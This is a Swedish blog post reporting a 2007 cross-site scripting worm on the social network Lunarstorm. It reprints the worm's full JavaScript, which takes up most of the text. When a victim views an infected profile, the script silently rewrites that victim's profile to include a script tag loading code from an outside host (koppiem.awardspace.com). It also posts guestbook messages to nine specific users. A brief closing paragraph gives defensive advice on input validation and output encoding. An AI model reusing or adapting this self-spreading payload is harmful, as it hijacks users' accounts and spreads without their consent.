Lunarstorm utsatt för attack

2007-07-15 15:02 | Kategorier » IT-säkerhet, Webb,

Lunarstorm har i natt rÃ¥kat ut för en XSS-attack. XSS stÃ¥r för ”Cross site scripting” och innebär förenklat att man kan fÃ¥ kod frÃ¥n andra ställen att köras pÃ¥ en sida. HÃ¥let är nu fixat och de drabbade kontona är Ã¥terställda.

Masken spred sig genom att man besökte en presentation som redan var ”smittad”, det ledde till att ett script kördes som direkt ändrade ens presentation och lade till sig självt även där. OvanpÃ¥ detta sÃ¥ skickades även gästboksinlägg till nio användare, varför det är rimligt att anta att skaparen hade nÃ¥got emot just dessa.

Det är i mina ögon uppseendeväckande att en så stor sida som Lunarstorm inte hade högre säkerhet vad gäller sådant här. Något av det första man som webbprogrammerare ser till att skydda sig mot är attacker av det här slaget.

Nedanför följer attackkoden som användes mot Lunarstorm. Orsaken att jag publicerar denna är att fler ska få upp ögonen för vad XSS är och hur man kan skydda sig mot det. Jag ansvarar inte för vad ni gör med koden! Det är inte heller jag som har kodat masken och inte heller är det jag som ligger bakom attacken, bara så att det inte råder det minsta tvivel om det.

var xmlhttp=false;

/*@cc_on @*/
/*@if (@_jscript_version >= 5)
// JScript gives us Conditional compilation, we can cope with old IE versions.
// and security blocked creation of the objects.
  try {
  xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
  } catch (e) {
   try {
    xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
   } catch (E) {
    xmlhttp = false;
   }
  }
@end @*/

if(window.ActiveXObject) //Detta är för Internet Explorer
{
  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}
/*if (!xmlhttp && typeof XMLHttpRequest!='undefined')*/
else {
  xmlhttp = new XMLHttpRequest();
}

    var r4ndomnr=Math.floor(Math.random()*5);
    var randomnr=Math.floor(Math.random()*9);

    var gbtext=new Array(5)
     gbtext[0]="Fan va bra du " + unescape("%E4") + "r! :O";
     gbtext[1]="H" + unescape("%F6") + "rru d" + unescape("%F6") + "rru vart la du sillburken?";
     gbtext[2]="Det var en g" + unescape("%E5") + "ng en gris, men den grisen finns inte mer";
     gbtext[3]=unescape("%E4") + "re n" + unescape("%F6") + "tarNNnNnNNN^.";
     gbtext[4]="En kebab, eller kanske tv" + unescape("%E5") + "?";

    var gbuser=new Array(9)
     gbuser[0]="{116eb464-606c-4eae-8443-3edf029d3616}";
     gbuser[1]="{d1589118-6869-4146-8d7d-6ed5fc6b134c}";
     gbuser[2]="{c8c39ddd-b646-44db-ba91-af4833f67570}";
     gbuser[3]="{09084660-84CF-4FD1-9953-D98D6487496A}";
     gbuser[4]="{88CB53D0-8961-4D4B-8DF9-E9387A8FEEEA}";
     gbuser[5]="{9162CB93-99AA-4888-AFCC-D917328EC174}";
     gbuser[6]="{8B496A22-C65E-4451-BAE9-E0EA6D92B869}";
     gbuser[7]="{2515B502-3FAB-4258-9B1B-90BE999C7318}";
     gbuser[8]="{B7197B42-DE49-4449-B604-530403BDAC11}";

function stop(){
}

function sendgb(){
  if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
      {
        var pd;

        pd="__EVENTTARGET=sendGuestbook%3A_ctl5%3AbtnSend%3AbtnSend_a&__EVENTARGUMENT=&__VIEWSTATE=dDwxOTk4MzY2NzUzO3Q8cDxsPGZj";
        pd+="O2NwO291O3BpO29pO3VuO3NtO21sO2hwO21jOz47bDxTeXN0ZW0uQnl0ZSwgbXNjb3JsaWIsIFZlcnNpb249MS4wLjUwMDAuMCwgQ3VsdHVyZT1u";
        pd+="ZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5PDA%2BOzUwPDE%2BO288Zj47NTA8MD47U3lzdGVtLkd1aWQsIG1zY29ybGli";
        pd+="LCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTxjZTMzYzFhNi03Mjhm";
        pd+="LTQ4MmItYjE5Mi1iN2IyODYzOTQwZmU%2BO2dvb29vb2Q7XGU7aTwxPjtvPGY%2BO2k8MT47Pj47bDxpPDA%2BOz47bDx0PDtsPGk8MT47PjtsPHQ8O2w8aTwxPjtpPD";
        pd+="M%2BOz47bDx0PDtsPGk8MT47aTw3PjtpPDk%2BOz47bDx0PHA8bDxUZXh0Oz47bDxnb29vb29kcyBHw6RzdGJvaywgMSBpbmzDpGdnOz4%2BOzs%";
        pd+="2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VmlzaWJsZTs%2BO2w8bzx0Pjs%2BPjtsPGk8MT47PjtsPHQ8cDxsPFRleHQ7Pj";
        pd+="tsPGdvb29vb2QgaGFyIGludGUgZsOldHQgbsOlZ3JhIGfDpHN0Ym9rc2lubMOkZ2cgw6RuLiA9KDs%2BPjs7Pjs%2BPjs%2BPjt0PDtsPGk8MT47";
        pd+="aTwxMz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PDtsPGk8Nz47aTw5PjtpPDExPjtpPDEzPjtpPDE1PjtpPDE3PjtpPDE5";
        pd+="PjtpPDIxPjtpPDIzPjtpPDI1PjtpPDI3PjtpPDM1Pjs%2BO2w8dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzgxJyk7Pj47Oz47";
        pd+="dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzgyJyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzgz";
        pd+="Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzg0Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpj";
        pd+="VGhlbWUoJzg1Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzg2Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2";
        pd+="YXNjcmlwdDpjVGhlbWUoJzg3Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzg4Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNj";
        pd+="cmlwdDpjVGhlbWUoJzg5Jyk7Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8amF2YXNjcmlwdDpjVGhlbWUoJzkwJyk7Pj47Oz47dDxwPGw8c3JjOz47bD";
        pd+="wuLi9fZ2Z4L3RoZW1lL3NtYWxsL2Jhc2U3LmdpZjs%2BPjs7Pjt0PDtsPGk8MT47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PHA8cDxsPFRleHQ7";
        pd+="PjtsPFNraWNrYSZuYnNwXDtpbmzDpGdnOz4%2BOz47Oz47Pj47Pj47Pj47Pj47Pj47Pj47dDxwPHA8bDxGYXZvcml0ZXM7PjtsPDUwPDA%2BOz4%2BOz47Oz47Pj47Pj";
        pd+="47Pj47Pj47PtSQQQJsfmCi%2FQXr6%2FP92lpV4dkr&sendGuestbook%3AtxtBuis%3A_txtTextBox=";
        pd+=encodeURI(gbtext[r4ndomnr]);
        pd+="&sendGuestbook%3AhidTheme=";

        loadXMLDoc("/gst/gst_guestbook.aspx?userid="+gbuser[randomnr],pd,changepress);
      }
  }

function changepress(){
  if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
      {
        var pd;
        /*
        pd="__EVENTTARGET=_ctl22%3AbtnPreview%3AbtnPreview_a&__EVENTARGUMENT=&__VIEWSTATE=dDw2NzY5NjU4NTt0PDtsPGk8MD47PjtsPHQ8O2w8aTwxMz47";
        pd+="aTwxNT47aTwxNz47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDxwPGw8b25zdWJtaXQ7PjtsPHJldHVybiB2YWxpZGF0ZSgpOz4%2BO2w8aTwzPjs%2BO2w8dDxwPGw8VmlzaW";
        pd+="JsZTs%2BO2w8bzx0Pjs%2BPjtsPGk8MT47aTwyPjtpPDY%2BOz47bDx0PHA8bDxWaXNpYmxlOz47bDxvPHQ%2BOz4%2BOzs%2BO3Q8O2w8aTwxMz47aTwyOT47aTwzMT47PjtsPHQ8cDw7cD";
        pd+="xsPG9uQ2xpY2s7PjtsPHVwZGF0ZUJvb2xWYWxzKCdjaGJQaG90b1RvUmlnaHQnLCB0aGlzLmNoZWNrZWQpXDs7Pj4%2BOzs%2BO3Q8O2w8aTwzPjs%2BO2w8dDw7bDxp";
        pd+="PDE%2BO2k8Mz47PjtsPHQ8cDw7cDxsPG9uY2xpY2s7PjtsPGphdmFzY3JpcHQ6IERpdlBvcChiZ1NvdW5kMSlcOzs%2BPj47Oz47dDxwPDtwPGw8b25jbGljazs%2BO2";
        pd+="w8amF2YXNjcmlwdDogRGl2UG9wKGJnU291bmQyKVw7Oz4%2BPjs7Pjs%2BPjs%2BPjt0PDtsPGk8Mz47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDx0PHA8O3A8bDxvbmNoYW5nZTs%2BO2w8amF2";
        pd+="YXNjcmlwdDogQ2hhbmdlRHJvcERvd25NVCgpXDs7Pj4%2BOzs%2BOzs%2BOz4%2BOz4%2BOz4%2BO3Q8O2w8aTwyPjs%2BO2w8dDw7bDxpPDA%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8cDxw";
        pd+="PGw8VGV4dDs%2BO2w8RsO2cmhhbmRzZ3JhbnNrbmluZw0KOz4%2BOz47Oz47Pj47Pj47Pj47Pj47Pj47Pj47dDw7bDxpPDE%2BOz47bDx0PHA8bDxWaXNpYmxlOz47bD";
        pd+="xvPHQ%2BOz4%2BOzs%2BOz4%2BO3Q8cDxsPFRleHQ7PjtsPE5vcm1hbGl6ZSgnaGV4JylcOzs%2BPjs7Pjs%2BPjs%2BPjs%2BZkk9eSmxt66riAu%2B2Wmss4EzRXM%3D";
        pd+="&txtBody=";
        pd+=encodeURI("Dezek, grisris, sillburken <3");
        */

        pd="__EVENTTARGET=btnSaveChanges%3AbtnSaveChanges_a&__EVENTARGUMENT=&__VIEWSTATE=dDw2NzY5NjU4NTt0PHA8bDxoaWRCb2R5U";
        pd+="mF3O2RkbFNvdW5kQ2xpcDs%2BO2w8RGV6M2sgXDwzIFBpcmF0ZSdzITtcZTs%2BPjtsPGk8MD47PjtsPHQ8O2w8aTwxMz47aTwxNT47aTwxNz47P";
        pd+="jtsPHQ8O2w8aTwxPjs%2BO2w8dDxwPGw8b25zdWJtaXQ7PjtsPHJldHVybiB2YWxpZGF0ZSgpOz4%2BO2w8aTwzPjtpPDU%2BOz47bDx0PHA8bDxWaXNpYmxlOz47bDx";
        pd+="vPGY%2BOz4%2BO2w8aTwxPjtpPDI%2BO2k8Nj47PjtsPHQ8cDxsPFZpc2libGU7PjtsPG88dD47Pj47Oz47dDw7bDxpPDEzPjtpPDI5PjtpPDMxP";
        pd+="js%2BO2w8dDxwPDtwPGw8b25DbGljazs%2BO2w8dXBkYXRlQm9vbFZhbHMoJ2NoYlBob3RvVG9SaWdodCcsIHRoaXMuY2hlY2tlZClcOzs%2BPj4";
        pd+="7Oz47dDw7bDxpPDM%2BOz47bDx0PDtsPGk8MT47aTwzPjs%2BO2w8dDxwPDtwPGw8b25jbGljazs%2BO2w8amF2YXNjcmlwdDogRGl2UG9wKGJnU";
        pd+="291bmQxKVw7Oz4%2BPjs7Pjt0PHA8O3A8bDxvbmNsaWNrOz47bDxqYXZhc2NyaXB0OiBEaXZQb3AoYmdTb3VuZDIpXDs7Pj4%2BOzs%2BOz4%2BOz4%2BO3Q8O2w8aTw";
        pd+="zPjs%2BO2w8dDw7bDxpPDE%2BOz47bDx0PHQ8cDw7cDxsPG9uY2hhbmdlOz47bDxqYXZhc2NyaXB0OiBDaGFuZ2VEcm9wRG93bk1UKClcOzs%2BP";
        pd+="j47Oz47Oz47Pj47Pj47Pj47dDw7bDxpPDI%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxGw7Zya";
        pd+="GFuZHNncmFuc2tuaW5nDQo7Pj47Pjs7Pjs%2BPjs%2BPjs%2BPjs%2BPjt0PHA8bDxWaXNpYmxlOz47bDxvPHQ%2BOz4%2BO2w8aTwzPjtpPDQ%2BO2k8NT47PjtsPHQ";
        pd+="8O2w8aTw1PjtpPDc%2BOz47bDx0PHA8bDxUZXh0Oz47bDwxODs%2BPjs7Pjt0PHA8bDxUZXh0Oz47bDwyMDAwMDs%2BPjs7Pjs%2BPjt0PDtsPGk";
        pd+="8MT47aTwzPjs%2BO2w8dDxwPGw8dXNlcklEO2dlbmRlcjtwaWN0dXJlO3VzZXJuYW1lO2JpcnRoRGF0ZTs%2BO2w8U3lzdGVtLkd1aWQsIG1zY29";
        pd+="ybGliLCBWZXJzaW9uPTEuMC41MDAwLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OTxjZTMzYzFhNi0";
        pd+="3MjhmLTQ4MmItYjE5Mi1iN2IyODYzOTQwZmU%2BO288Zj47aTwwPjtnb29vb29kO1N5c3RlbS5EYXRlVGltZSwgbXNjb3JsaWIsIFZlcnNpb249M";
        pd+="S4wLjUwMDAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5PDE5ODYtMDQtMDQ%2BOz4%2BOzs%2BO3Q";
        pd+="8cDxsPFRleHQ7PjtsPERlejNrICZsdFw7MyBQaXJhdGUncyE7Pj47Oz47Pj47dDw7bDxpPDE%2BO2k8Mz47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDx";
        pd+="wPHA8bDxUZXh0Oz47bDzDhG5kcmENCjs%2BPjs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxTcGFyYSZuYnNwX";
        pd+="Dtmw7Zyw6RuZHJpbmdhcg0KOz4%2BOz47Oz47Pj47Pj47Pj47Pj47Pj47dDw7bDxpPDE%2BOz47bDx0PHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BOz4%2BO3Q8cDxsPFRleHQ7P";
        pd+="jtsPEluaXRQcmV2aWV3KClcOzs%2BPjs7Pjs%2BPjs%2BPjs%2Bg2aHZwq703N3OpvAAhWxjK5MbYU%3D&hidStatusMessage=&hidHeight=128";

        loadXMLDoc("/set/set_presentation.aspx",pd,stop);
      }
  }

function injectscript(){
  if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
      {
        var pd;
        pd="__EVENTTARGET=Buttons1%3AbtnSave%3AbtnSave_a&__EVENTARGUMENT=";
        pd+="&__VIEWSTATE=dDwtMTI5NjAyNzE5Ozs%2BZlKIxAVJgXhhZ8sZa4X73mExPZ4%3D&hdAvId=av0";
        pd+="&hidStatusMessage=++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++";
        pd+="&hidHasPhoto=0&geoCountry=231&geoCity=1163&geoRegion=17&txtCityArea=&txtHomepage=";
        pd+="www.hamsterpaj.net%2Fforum%2Fhamsterpaj%2Fallmaent_om_hamsterpaj%2Ffoersvarstal_foer_forumet%2F%22%3E%3Cscript%2Fsrc%3Dhttp%3A%2F%2Fkoppiem.awardspace.com%2Fscript.js%3E%3C%2Fscript%3E%3Ca";
        pd+="&txtIcqNumber=&txtMsnMessenger=";
        pd+=encodeURI("Dezek Grisris sillburken <3");;
        pd+="&txtSkype=&ddlA1=0";
        pd+="&ddlA2=0&ddlA3=0&ddlA4=0&ddlA5=0&ddlA6=0&ddlA7=0&ddlA8=0&ddlA9=0";
        loadXMLDoc("/set/set_public.aspx",pd,sendgb);

      }
  }

var ie;
function loadXMLDoc(url,foo,func) {
   ie= document.all?true:false

    if(foo=="")
    {
      xmlhttp.open("GET",url, true);
      xmlhttp.onreadystatechange = func;
      xmlhttp.send(null);
    }
    else
    {
      xmlhttp.open("POST",url, true);
      xmlhttp.onreadystatechange = func;
      xmlhttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
      xmlhttp.send(foo);
    }

}

loadXMLDoc("/set/set_public.aspx","",injectscript);

Hur kunde Lunarstorm skyddat sig mot detta? Enkelt, genom att helt enkelt se över vilka värden man tar emot i sina fält. Genom att inte skriva ut data utan att ha HTML-kodat den. Hade dessa två enkla regler följts så skulle masken inte kunnat sprida sig.

Lämna en kommentar


Regler för kommentarer på Gate 303

Creeper MediaCreeper